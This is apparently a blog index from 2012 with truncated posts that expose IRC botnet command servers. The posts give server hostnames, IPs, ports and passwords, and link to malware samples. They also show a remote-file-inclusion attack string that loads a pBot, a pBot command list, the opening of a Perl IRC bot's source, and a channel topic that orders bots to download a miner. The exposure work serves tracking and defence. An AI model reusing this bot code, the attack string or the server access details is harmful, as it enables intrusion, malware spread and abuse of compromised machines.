Another post from same guy here http://www.exposedbotnets.com/2012/04/webethugsinsomnia-bot-hosted-in.html Samples here: http://www.mediafire.com/?f25869md9bv3q9d password: virus Control Panel: Control Panel Url http://anonproducts.info/xx/ Loader.exe is a .net http bot, that connects to global-carding.ru/gate.php. Used for ddosing and loading malware (mainly RATS). Most files to be installed are loaded from webcamchat4free.in. Packet captures of it in action http://www.mediafire.com/?t8obhi8jttvh1l5 Credits to ourRead more...
we.be.thu.gs(Insomnia bot hosted in Netherland Amsterdam Ecatel Ltd)
A guy posted in this thread http://www.exposedbotnets.com/2012/04/insomnia-irc-bot-v113-manual.html about another Insomnia botnet server u can read in comments for more Resolved : [we.be.thu.gs] To [80.82.79.21] Bv1’s insomnia bot server Server we.be.thu.gs ssl required to connect. use xchat or install it on mirc accept his invalid certificate Port 443 Password fuckyou To conect do this /server we.be.thu.gs:+443Read more...
INSOMNIA IRC Bot v1.1.3 Manual
Insomnia is another irc bot sold in hecking forums coded in .NET I m posting the manual here so u can see what it does INSOMNIA v1.1.3 Table of Contents 1. Summary 2. Core Features 3. Malware Removal 4. SOCKS5 5. DDoS 6. Spreading Modules 7. Topic Generator Explained 8. Complete command list Summary InsomniaRead more...
noaccess.chaoswow.net(NZM bots hosted in Germany Nuremberg Hetzner Online Ag)
Resolved : [noaccess.chaoswow.net] To [176.9.195.60] Remote Host Port Number noaccess.chaoswow.net 18967 NICK USA|00|XP|SP2|1884237 USER fhfrlaam 0 0 :USA|00|XP|SP2|1884237 USERHOST USA|00|XP|SP2|1884237 MODE USA|00|XP|SP2|1884237 -x+i JOIN ##&crackr0x#&## 1@$$smoqueed@@ NICK USA|00|XP|SP2|0441020 USER zfoxtlp 0 0 :USA|00|XP|SP2|0441020 USERHOST USA|00|XP|SP2|0441020 MODE USA|00|XP|SP2|0441020 -x+i NICK USA|00|XP|SP2|5607084 USER ucxoiuauh 0 0 :USA|00|XP|SP2|5607084 USERHOST USA|00|XP|SP2|5607084 MODE USA|00|XP|SP2|5607084 -x+i NICK USA|00|XP|SP2|5062754 USER oqqeofyr 0Read more...
fghfg.translate-google-cache.com(irc botnet hosted in Taiwan Taipei Taiwan Fixed Network Co. Ltd)
Remote Host Port Number fghfg.translate-google-cache.com 5900 other domains: tux.shannen.cc urcdw.zavoddebila.com NICK [USA][XP-SP2]669217 USER VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY2742 JOIN ##Turb0-37## NICK [USA][XP-SP2]062388 USER VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY7011 NICK {NOVA}[USA][XP-SP2]750366 USER VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY0938 hosting infos: http://whois.domaintools.com/61.31.99.67
Irc.javairc.org(turkish noobs scaning for RFI)
i was looking for online users in my vbulletin site and i saw this : /threads//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://95.154.24.14:32000//accounts/inc/admin/apache.jpg i downloaded apache.jpg and i found that is a lame pBot directing to irc.javairc.org here http://95.154.24.14:32000//accounts/ i found the lamer behind all this :-=[ HackeD by PasteL ]=- here is the chanel used for rfi scan Now talking inRead more...
69.66.87.90(pBot hosted in United States Des Moines Des Moines Public Schools)
= COMMANDS ============================================================================ .user <password> //login to the bot .logout //logout of the bot .die //kill the bot .restart //restart the bot .mail <to> <from> <subject> <msg> //send an email .dns <IP|HOST> //dns lookup .download <URL> <filename> //download a file .exec <cmd> // uses shell_exec() //execute a command .cmd <cmd> // uses popen() //execute aRead more...
yaboyyoshi.info(ngrBot hosted in United Kingdom Redstation Limited)
Resolved : [yaboyyoshi.info] To [149.3.139.227] Remote Host Port Number yaboyyoshi.info 6969 PASS none Update from our anonymous friend: yaboyyoshi.info:5500 or 6969 pass: none channel #aryan# Now talking in #aryan# Topic On: [ #aryan# ] [ @dload http://jessieandthetoyboys.com.br/cc_sminer_4-29.exe 1 ] Topic By: [ Yoshi ] hosting infos: http://whois.domaintools.com/149.3.139.227
irc.s4l1ty.info(Linux bots hosted in Indonesia Jakarta Primanet)
“Private Bot” lol #!/usr/bin/perl # # Thanks To: irc.RoIrc.in ########## Configuration ############ my @ps = ("/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[bash]"); my $processo = $ps[rand scalar @ps]; $servidor='irc.s4l1ty.info' unless $servidor; my $porta='6667'; my @canais=("#X"); my @adms=("s4l1ty"); # Anti Flood ( 6/3 Recomendado ) my $linas_max=10; my $sleep=5; my $nick = getnick(); my $ircname = getident2();Read more...
188.165.202.199(500 ngrBots hosted in France Paris Ovh Systems)
Server:188.165.202.199:7000 JOIN #team hell Local users: Current Local Users: 479 Max: 573 Global users: Current Global Users: 479 Max: 573 #team {DE|W7-64a}mkliatk!x@EFF4177A.A0F8E1F4.CC6C8B5.IP ~ZRt!Expl3it@IDFADM @Rejuven!Shlomi@IDFADM ~DAKiNE!Anonymous@IDFADM ~wGi!Nikka@IDFADM End of /NAMES list. :wGi!Nikka@IDFADM PRIVMSG #team :.usb on is funny how irc bots can steal passwd from chrome Session Start: Mon Apr 02 21:13:59 2012 Session Ident: #teamRead more...